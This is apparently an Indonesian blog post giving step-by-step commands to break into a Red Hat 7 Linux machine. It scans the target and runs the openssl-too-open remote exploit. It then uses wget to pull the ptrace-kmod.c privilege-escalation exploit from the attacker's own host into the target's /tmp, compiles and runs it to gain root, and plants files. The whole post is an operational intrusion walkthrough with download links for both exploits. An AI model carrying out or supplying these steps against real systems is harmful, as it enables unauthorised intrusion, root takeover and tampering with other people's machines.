Langkah - langkah penyerangannya pada linux redhat 7, sbb:
- Pastikan paket openssl-too-open sudah terinstall pada komputer linux anda. Kalo blm ada silahkan download dari komputer source yang sudah terdapat paket tersebut. Gunakan perintah wget pada konsole / terminal. Tetapi sebelumnya, pastikan bahwa di komputer linux anda service httpnya udah aktif. Perintahnya : wget http://alamat_ip_komp_source/file_yg_mau didownload /directory_yg mau disimpan. Contohnya : wget http://192.168.32.1/openssl-too-open.tar.gz /home
- Pastikan file openssl-too-open.tar.gz yg td di download sudah ada di direktori home. Gunakan perintah ls -l.
- Masuk ke direktori home perintahnya cd /home, lalu ekstrak file tersebut. Gunakan perintah : tar -zxvf openssl-too-open.tar.gz untuk mengekstrak.
- Cek hasil ekstrakan tersebut, gunakan perintah ls -l.
- Masuk ke direktory openssl-too-open, gunakan perintah cd openssl-too-open
- Install paket tersebut, gunakan perintah make
- Lakukan Scanning ke komputer target, gunakan perintah ./openssl-scanner -c alamat_ip_target
- Masuk ke komputer target, gunakan perintah telnet alamat_ip_target
- Setelah itu, jalankan openssl, gunakan perintah ./openssl-too-open -a -0x0b -v ip_kompt_target
- Cek hak akses anda, gunakan perintah whoami
- Klo hak akses anda blm root pada komputer target, ubah hak akses menjadi root. Masuk ke directory tmp. Gunakan perintah cd /tmp
- Download file ptrace-kmod.c dari komputer kita dan letakkan file tersebut di direktori tmp pada komputer target. gunakan perintah wget http://alamat_ip_anda/ptrace-kmod.c /tmp
- Eksekusi file tersebut, gunakan perintah gcc ptrace-kmod
- ls -l untuk melihat hasil eksekusi tersebut. Pastikan ada file a.out
- Ubah permission hak akses a.out. Gunakan perintah chmod +x a.out atau chmod 777 a.out
- Jalankan file a.out, gunakan perintah ./a.out
- Cek status anda, gunakan perintah whoami. Klo udah root, silahkan sisipkan file di direktori yg anda inginkan.
>>Download openssl-too-open
>>Download ptrace-kmod.c
1 comments: